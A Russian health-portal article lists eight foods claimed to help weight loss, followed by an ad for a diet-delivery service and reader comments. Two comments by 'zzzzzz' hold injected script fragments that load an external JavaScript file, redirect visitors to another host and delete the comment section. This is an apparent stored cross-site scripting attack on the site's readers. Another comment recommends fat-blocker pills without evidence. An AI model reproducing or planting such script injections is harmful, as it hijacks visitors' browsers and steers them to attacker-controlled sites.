Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чтобы худеть, надо есть. ...  >>  Чтобы худеть, надо есть. Что есть?
 
Обратная связь
 

Чтобы худеть, надо есть. Что есть?

Размер шрифта
10 июня 2014 00:00
  • google_analytics: false
  • Нравится

Вкусные продукты, которые помогают сохранить фигуру – это звучит слишком хорошо, чтобы быть правдой.

Чтобы худеть, надо есть. Что есть?

Без сомнения, потеря веса сводится к простой математике. Вы должны есть меньше калорий, чем вы сжигаете. Некоторые продукты помогут сбросить вес, потому что они надолго придают чувство сытости и уменьшают тягу к еде.

1 . Бобы

Недорогие, сытные и подходящие ко многим блюдам бобы являются отличным источником белка. Они также содержат большие запасы клетчатки и медленно усваиваются. Это означает, что вы будете долго чувствовать себя сытым.

2 . Суп

Начните трапезу с тарелки супа, и вы съедите меньше. При этом выбор супа не ограничен: обычный, пюре или бульон, средняя калорийность порции будет от 100 до 150 калорий. Но забудьте о сметане и масле.

3 . Темный шоколад

Хотите наслаждаться шоколадом между приемами пищи? Вы можете с легкостью позволить себе кусочек темного шоколада, но воздержитесь от покупки молочного. По результатам одного из исследований, любители темного шоколада съедают на 15% меньше еды спустя несколько часов, чем те, кто остановил свой выбор на молочном шоколаде.

4 . Овощное пюре

Вы можете добавить больше овощей в свой рацион, продолжая наслаждаться любимыми продуктами, но сократив количество калорий. Исследователи пришли к выводу, что добавление пюре цветной капусты и кабачкового пюре к макаронам и сыру, не влияет на вкусовое качество, а вот количество калорий сократилось с 350 до 200. Овощное пюре – это не только полезно, но и вкусно!

5 . Орехи

Выбирая лучший перекус на ходу, сложно выбрать что-то лучше порции миндаля, арахиса, грецких орехов или пекана. Исследования показывают, что когда люди, перекусывающие орехами, едят меньше во время других приемов пищи.

6 . Яблоки

Забудьте о яблочном соке и яблочном муссе, отдав предпочтение свежему хрустящему яблоку. Все фрукты притупляют аппетит, в отличие от фруктовых соков и малокалорийных фруктовых десертов.

Одной из причин является то, что фрукты содержат клетчатку. Кроме того, пока вы жуете (и чем дольше вы жуете), в мозг поступает сигнал, что вы съели что-то существенное.

7. Йогурт

Предпочитаете ли вы греческий или традиционный, йогурт очень полезен для вашей талии.

Исследование Гарвардского университета включало более чем 120 000 человек в течение более десяти лет. Йогурт из всех продуктов, которые отслеживались, был наиболее тесно связан с потерей веса.

Это не доказывает, что йогурт вызывает потерю веса, но он выделялся среди других продуктов питания.

8. Грейпфрут

Да, грейпфрут действительно может помочь избавиться от нескольких килограмм, особенно если вы находитесь в группе риска по диабету.

Исследователи клиники в Сан-Диего обнаружили, что когда полные люди ели половину грейпфрута перед каждым приемом пищи, они теряли в среднем 1,5 килограмма в течение 12 недель. Грейпфрутовый сок показал аналогичные результаты.

Будьте осторожны: избегайте употребления грейпфрута и грейпфрутового сока, если вы принимаете лекарственные препараты, поэтому перед включением этого полезного фрукта в рацион, посоветуйтесь со своим врачом.

Поход в магазин должен быть разумным. Будьте честны сами с собой: в следующий раз, когда пойдете в супермаркет, посмотрите у кассы, чем заполнена ваша корзина. Много ли в ней продуктов, которые богаты белком, свежих овощей, фруктов и цельнозерновых продуктов?

Ну, а для тех, кто хочет похудеть, но у кого нет времени создана «Диета Елены Малышевой»! Уже готовая правильная еда будет доставлена вам в любое место и время удобное для вас! Вам останется только есть и худеть.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 июня 2014 в 16:02

Комментарий удален за нарушение Правил общения

2 - Гость

05 августа 2014 в 23:58

Цитировать   |   Пожаловаться

Отличный набор продуктов, надо только как мне кажется, считать БЖУ, чтобы не перебрать с калориями, ну или принимать какой-нибудь блокатор жиров, я например таблетки с литрамином принимаю, чтобы контролировать поступающие калории.

3 - zzzzzz

30 июня 2015 в 18:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как лишний вес влияет на ваши ноги и их красоту
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.